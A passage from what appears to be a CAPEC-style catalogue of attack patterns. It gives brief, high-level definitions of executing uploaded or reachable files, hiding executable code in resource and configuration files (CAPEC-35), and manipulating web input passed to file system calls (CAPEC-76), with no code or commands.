An attack of this type exploits a system's configuration that allows an adversary to either directly access an executable file, for example through shell access; or in a possible worst case allows an adversary to upload a file and then execute it. Web servers, ftp servers, and message oriented middleware systems which have many integration points are particularly vulnerable, because both the programmers and the administrators must be in synch regarding the interfaces and the correct privileges for each interface.
CAPEC-35: Leverage Executable Code in Non-Executable Files
An attack of this type exploits a system's trust in configuration and resource files. When the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high.
CAPEC-76: Manipulating Web Input to File System Calls
An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.